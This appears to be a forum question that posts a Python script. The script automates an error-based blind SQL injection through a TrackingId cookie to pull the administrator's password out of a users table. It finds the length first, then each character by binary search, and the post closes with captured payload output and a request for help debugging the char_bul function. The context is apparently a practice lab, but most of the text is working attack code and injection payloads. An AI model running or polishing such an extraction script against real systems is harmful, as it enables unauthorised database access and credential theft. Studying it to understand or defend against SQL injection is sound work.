Binary search in Error Based Blind SQL with Python

import requests

# Interactive inputs: the target URL plus the two cookie values every probe
# below sends. Nothing is validated here; whatever is typed is used verbatim.
url=input("URL:")
track=input("Tracking ID:")
sess=input("Session ID:")
# Module-level `password` is rebound later by the `sifre_bul(passuz)` call;
# this initial value is never read in between.
password = ('')
# Candidate alphabet that char_bul() binary-searches over; its order matters
# because the search assumes chars[] is sorted the same way the server
# compares strings (this is a script assumption, not something verified here).
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"


def uzun_tespit(pl: str) -> bool:
    """Send one probe for the length phase and report whether it returned 200.

    Args:
        pl: Full value placed in the ``TrackingId`` cookie.

    Returns:
        True iff the HTTP status code was exactly 200.

    Side effects:
        One GET request to the module-level ``url``; prints the payload, the
        status code and the first 500 characters of the response body.
    """
    ck = {'TrackingId': pl, 'session': sess}
    cvp = requests.get(url, cookies=ck)
    print(f"Payload: {pl} | Status Code: {cvp.status_code}")
    # Only a prefix of the body is echoed, so a large page does not flood stdout.
    print(f"Response Text: {cvp.text[:500]}")
    return cvp.status_code == 200

def uzun_bul() -> int | None:
    """Linearly scan candidate lengths 1..24 and return the first one accepted.

    For each ``uz`` a payload is built and handed to ``uzun_tespit``; the first
    ``uz`` for which that call is truthy (status 200) is returned.

    Returns:
        The first accepted length, or None when none of 1..24 was accepted.
        Callers must handle None: ``sifre_bul`` does ``passuz + 1`` on it.
    """
    # range upper bound is exclusive, so lengths 25 and above are never tried.
    for uz in range(1, 25):
        pl = f"{track}'||(SELECT CASE WHEN LENGTH(password)>{uz} THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'"
        print(f"Denenen Uzunluk: {uz}")
        if uzun_tespit(pl):
            return uz
    return None


# Runs at import/script time: the length phase fires its requests immediately.
# `passuz` may be None (see uzun_bul), which the later sifre_bul call does not guard.
passuz = uzun_bul()
print(f"Şifre uzunluğu: {passuz} ")

def pass_tespit(pl: str) -> bool:
    """Send one probe for the character phase and report whether it returned 500.

    Args:
        pl: Full value placed in the ``TrackingID`` cookie.

    Returns:
        True iff the HTTP status code was exactly 500 (the inverse of the
        200-test used by ``uzun_tespit``).

    Side effects:
        One GET request to the module-level ``url``; prints payload and status.
    """
    inf = {'TrackingID': pl, 'session': sess}
    cvp = requests.get(url, cookies=inf)
    print(f"Payload{pl}, Status: {cvp.status_code}")
    return cvp.status_code == 500


def char_bul(digit: int) -> str | None:
    """Binary-search ``chars`` for the character at 1-based position ``digit``.

    Each iteration costs up to two requests: an equality probe first, then a
    greater-than probe that decides which half to keep. The search terminates
    as soon as an equality probe is truthy (status 500).

    Args:
        digit: 1-based index passed into SUBSTR.

    Returns:
        The matched character, or None once the search window is exhausted.

    NOTE(review): the search assumes the server's string ordering agrees with
    the index order of ``chars`` and that exactly one of the two probes flips
    per comparison; if every probe yields 500 regardless of the CASE result,
    the first equality probe is truthy and the first midpoint is returned —
    which is consistent with the captured output at the bottom of the page.
    """
    alt = 0
    ust = len(chars) - 1
    while alt <= ust:
        orta = (alt + ust) // 2
        char = chars[orta]
        pl = f"{track}' AND (SELECT CASE WHEN SUBSTR(password,{digit},1)='{char}' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'"
        if pass_tespit(pl):
            return char
        # Second request per iteration: only reached when equality was rejected.
        elif pass_tespit(f"{track}' AND (SELECT CASE WHEN SUBSTR(password,{digit},1)>'{char}' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'"):
            alt = orta + 1
        else:
            ust = orta - 1
    return None

def sifre_bul(passuz: int) -> str:
    """Assemble a string by calling ``char_bul`` for positions 1..passuz.

    Args:
        passuz: Number of positions to query. Must be an int: a None value
            (what ``uzun_bul`` returns on failure) raises TypeError at
            ``passuz + 1`` before any request is made.

    Returns:
        The concatenation of every non-falsy ``char_bul`` result, stopping at
        the first position for which ``char_bul`` returned None.
    """
    # Local name shadows the module-level `password`; the caller rebinds that.
    password = ''
    for i in range(1, passuz + 1):
        char = char_bul(i)
        if char:
            password += char
            print(f"{i}. karakter: {char}")
        else:
            # A None from char_bul ends the loop early; trailing positions are skipped.
            print(f"{i}. karakter yok. Şifre tamamlandı.")
            break
    return password

# Rebinds the module-level `password`; raises TypeError if `passuz` is None.
password = sifre_bul(passuz)
print(f"Password: {password}")

Payload: YPIFNFVqUmqRx30y' AND (SELECT CASE WHEN SUBSTR(password,1,1)='g' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' | Status Code: 500 Response Text:

Payload: YPIFNFVqUmqRx30y' AND (SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' | Status Code: 500 Response Text:

Payload: YPIFNFVqUmqRx30y' AND (SELECT CASE WHEN SUBSTR(password,1,1)='c' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' | Status Code: 500 Response Text:

So the first part is my code and the second part is my output after it reports the password length. I am trying to find the password with a binary search, but it won't work. I know the problem is in the function char_bul, but I can't find any logical reason for it. Please help, and thanks to everyone who replies.
